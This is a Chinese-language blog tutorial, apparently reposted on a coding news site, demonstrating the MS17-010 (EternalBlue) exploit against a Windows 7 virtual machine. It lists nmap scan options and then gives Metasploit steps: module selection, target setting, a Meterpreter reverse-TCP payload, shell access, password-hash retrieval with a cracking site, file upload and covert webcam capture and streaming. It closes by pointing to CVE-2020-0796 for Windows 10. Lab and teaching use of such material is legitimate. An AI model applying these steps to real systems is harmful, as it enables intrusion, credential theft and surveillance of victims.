主机漏洞利用演示MS17-010(永恒之蓝)

news2024/11/19 23:24:19

ms17-010危害:对被攻击方的电脑造成蓝屏!

申明:本篇文章的用意仅做学习使用

网络搭建环境:

软件:Vmware Workstation 17

攻击机:Kali

靶机环境:Windows 7

Nmap软件的基本功能:

1、主机发现(Host Discovery)

2、端口扫描(Port Scanning)

3、版本侦测(Version Detection)

4、操作系统侦测(Operating System Detection)

Nmap优点:

1、灵活:支持数十种不同的扫描方式,支持多种目标对象的扫描。

2、强大:Nmap可以用于扫描互联网上大规模的计算机。

3、可移植:支持主流的操作系统:windows/Linux/Mac OS等

4、简单:提供默认的操作能覆盖大部分功能,基本端口扫描。

5、自由:Nmap是一款开源软件,在GPL License的范围内可以自由使用。

6、社区支持:Nmap是一款开源软件,背后有强大的社区团队支持。

Nmap常用的扫描命令

1、完整的全面扫描

命令为:nmap -T4 -A -v ip

-A  选项用于使用进攻性(Aggressive)方式扫描;

-T4 指定扫描过程使用的时序(Timing),总共有6个级别(0 - 5),级别越高,速度越快,但也容易被防火墙发现。

-v 表示显卡冗余(verbosity)信息,在扫描过程中显示扫描的细节,从而让用户了解当前的扫描状态。

2、扫描多台主机

命令为:nmap ***.***.***.1 ***.***.***.2 ***.***.***.3

3、扫描整个子网

命令为:nmap 192.168.64.*

Nmap常用扫描命令

-sT :TCP connect扫描

-sS :TCP SYN扫描

-sF/-sX/-sN :通过发送一些特殊的标志位以避开设备或软件的检测

-sP :通过发送ICMP echo请求探测主机是否存活,原理同ping

-sU :探测目标主机开放了哪些UDP端口

-sA :TCP ACK扫描,对防火墙上未屏蔽的端口进行探测

-sV :获取对呀端口上更为详细的服务版本信息

-Pn :在扫描之前,不发送ICMP echo请求测试目标是否存活

-o :启动对于TCP/IP协议栈的指纹特征扫描以获取远程主机的操作系统类型等信息

-F :快速扫描模式,只扫描在nmap-services中列出的端口

 

介绍完Nmap扫描工具后,下面来进行MS17-010的实验!

MS17-010漏洞攻击

漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞

Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定的安全风险。

Microsoft Windows Server 2016 、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等

 MS17-010漏洞攻击实验过程:

第1步:使用nmap -T4 -A -v -Pn 192.168.64.1/24 扫描Windows 7客户端的端口有哪些是开放的

可以看到这台电脑有很多端口是开放的,比如SMB的445端口

 

 第2步:启用msf 渗透工具

 第3步:搜索ms17-010(下面显示的)

第4步:选择use 3 的攻击模块(进行辅助扫描,确定漏洞是否存在)

第5步:使用show options命令查看设置(配置)

RHOSTS:这一项是填写目标(被攻击方)主机的IP地址

set rhosts 192.168.64.129 (确定目标(Windows 7的IP地址))

use 0 利用smb协议溢出漏洞的缺陷攻击Windows的操作系统(漏洞名称:ms17-010)

 

 

set rhosts 192.168.64.129   设置被攻击方的IP地址

set payload windows/x64/meterpreter/reverse_tcp  设置攻击载荷模块

 

getuid   查看当前的系统用户id权限

shell   进入被攻击方的DOS界面

exit    退出被攻击方的DOS界面

 

 

 可以看到Windows 7的密码是以md5加密方式显示的

解密网站:https://www.cmd5.com

 

这里演示上传一张图片到Windows7系统

注意:我做实验的环境是在Vmware虚拟机,需要在虚拟机上设置允许获取物理机的摄像头权限

 

 

 

虚拟机右下方Chicony Integrated Camera的设备亮绿灯就表示虚拟机已经连接上物理机摄像头

开启摄像头

webcam_list    查看摄像头

webcam_snap  通过摄像头拍照

webcam_stream  通过摄像头开启视频

 

 下面使用webcam_stream开启了摄像头的视频功能(摄像头的视频画面不便展示)

 到这里MS17-010的实验就算结束了。

此实验只针对在Windows7系统上做MS17-010(永恒之蓝),在Windows 10操作系统上已经不存在MS17-010的漏洞了,如果要进行漏洞尝试,请尝试CVE-2020-0796(永恒之黑)。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/790922.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

渐进式网络恢复调研

渐进式网络恢复调研 问题定义(PNR) 如果发生重大网络中断(例如由地震、洪水等大规模灾害),运营商必须通过一系列修复步骤来恢复其网络基础设施。优化这个序列以在恢复过程中最大化提供的服务数量的问题通常称为渐进式网络恢复&a…

Phong光照模型原理及着色器实现

现实世界中的照明极其复杂,取决于太多因素,我们无法以有限的处理能力来计算这些因素。 因此,OpenGL 中的光照基于使用简化模型的现实近似值,这些模型更容易处理并且看起来相对相似。 这些照明模型基于我们所理解的光物理学。 其中…

桥接模式-处理多维度变化

程序员小名去摆摊卖奶茶了,口味有香、甜。 型号有大、中、小。假如小名先在家里把这些奶茶装好,那么最少要装2x3 6杯奶茶,如果此时新增一个口味:酸,那么就需要多装3杯奶茶了。而且这样做,等客户买走一种&a…

c++网络编程:Boost.asio源码剖析

1、前言 Boost库是一个可移植、提供源代码的C库,作为标准库的后备,是C标准化进程的开发引擎之一。Boost库由C标准委员会库工作组成员发起,其中有些内容有望成为下一代C标准库内容。在C社区中影响甚大,是不折不扣的“准”标准库。…

HCIA练习4

题目如下: 目录 第一步:IP的规划 第二步:缺省路由 第三步:开启telnet 第四步:编写ACL表 第五步:测试 思路分析: 华为默认允许所有,所以我们可以先写拒绝要求,再写允…

MobaXterm通过SSH访问Ubuntu服务器遇到的一个问题

在Windows下的MobaXterm界面配置完ubuntuIP以后显示access denied,排查发现是因为在ubuntu那边忘记安装了SSH Serve,安装过程如下: 第一步:安装所需包 让我们从打开终端输入一些必要命令开始。 注意,在安装新的包或…

【独家解答】面试题曝光:Spring容器中的Bean会不会被GC?

大家好,我是你们的小米!今天,我们来聊一个有关Spring容器中的Bean的话题,也是面试中经常被问到的问题:“Spring 容器中的Bean是否会被GC呢?为什么?”让我们一起揭开这个神秘的面纱,解…

记录一次软件安全测试过程

一.前言 xx的安测已经过去一段时间了,这两天xx需求刚发布。xx的外呼需求文档还没确定,所以趁着这个时间,进行一下复盘。这次xx安测,全程参与,经历了3轮,从5月份开始,到6月底正式通过安测,实属不易。安测主要分为漏洞扫描、越权扫描、日志审查、软件版本基线检查下面也将…

Visual Studio 2022 程序员必须知道高效调试手段与技巧(上)

🎬 鸽芷咕:个人主页 🔥 个人专栏:《C语言初阶篇》 《C语言进阶篇》 ⛺️生活的理想,就是为了理想的生活! 文章目录 📋 前言💬 什么是bug?💬 调试是什么?有多重要&#x…

css设置八等分圆

现需要上图样式的布局,我通过两张向右方的图片,通过定位和旋转完成了布局。 问题: 由于是通过旋转获取到的样式,实际的盒子是一个长方形,当鼠标移入对应的箭头时选中的可能是其他盒子,如第一张设计稿可以看…

uniapp 语音文本播报功能

最近uniapp项目上遇到一个需求 就是在接口调用成功的时候加上语音播报 , ‘创建成功’ ‘开始成功’ ‘结束成功’ 之类的。 因为是固定的文本 ,所以我先利用工具生成了 文本语音mp3文件,放入项目中,直接用就好了。 这里用到的工…

Android adb shell 查看App内存(java堆内存/vss虚拟内存/详细的内存状况/内存快照hprof)和系统可用内存

1.adb shell 获取app 进程的pid adb shell "ps|grep com.xxx包名"根据某个渠道包,去查询对应的pid,如下所示: 2.通过adb shell 查看设备的java dalvik 堆内存的最大值 执行命令行: adb shell getprop dalvik.vm.h…

【Java SE】继承与多态

目录 【1】继承 【1.1】为什么要继承 【1.2】继承概念 【1.3】继承的语法 【1.4】父类成员访问 【1.4.1】子类中访问父类的成员变量 【1.4.2】子类中访问父类的成员变量 【1.5】super关键字 【1.6】子类构造方法 【1.7】super和this 【1.8】再谈初始化 【1.9】prot…

element-plus中的collapse组件中的箭头图标移到左边问题解决(改进版)

1、问题BUG 这个问题虽然解决了,但是依旧有一些bug,首先我们来看一下,他的样式变成了什么样的。 下面就是我们修改后的样子了,但是对于我们的需求来说,左边的箭头样式是没问题了 可是到了箭头到了右边却变成了下面的…

17_LinuxLCD驱动

目录 Framebuffer设备 LCD驱动简析 LCD驱动程序编写 LCD屏幕参数节点信息修改 LCD 屏幕背光节点信息 使能Linux logo显示 设置LCD作为终端控制台 Framebuffer设备 先来回顾一下裸机的时候LCD驱动是怎么编写的,裸机LCD驱动编写流程如下: 1.初始化I.MX6U的eLCDIF控制器,…

Gumbel Softmax Trick

Gumbel Softmax Trick 重参数化技巧(re-parameters trick)Gumbel softmax trick基于Softmax的采样基于Gumbel-max的采样基于Gumbel-softmax采样Softmax中的温度系数tau 算法学习之gumbel softmax 【Learning Notes】Gumbel 分布及应用浅析 gumbel-softma…

Failed to connect to 127.0.0.1 port 7890科学上网导致的问题

找了很多种解法: 首先这个.config配置文件有两个地方存在:先使用第一种方式,不管用再试第二种 第一个位置git安装路径:不需要重启 E:\git\Git\etc,这个需要看你自己的安装路径,找到http_proxy删除即可第二…

类型转换函数

再论类型转换 标准数据类型之间会进行隐式的类型安全转换 转换规则如下: 问题 普通类型与类类型之间能否进行类型转换? 类类型之间能否进行类型转换? 再论构造函数 构造函数可以定义不同类型的参数 参数满足下列条件时称为转换构造函数…

LocalDateTime的json格式化问题

目录 解决: 1、注册日期序列化器 2、自定义LocalDateTime的JSON格式 3、使用第三方库 总结: 实体类中定义了LocalDateTime类型的属性,获取数据会出现以下日期格式问题: 讲述: 对于LocalDateTime的JSON序列化和反序…

解析数据可视化工具:如何选择最合适的软件

在当今信息爆炸的时代,数据已成为各行各业的重要资源。为了更好地理解和分析数据,数据可视化成为一种必不可少的工具。市面上数据可视化工具不说上千也有上百,什么帆软、powerbi、把阿里datav,腾讯云图、山海鲸可视化等等等等&…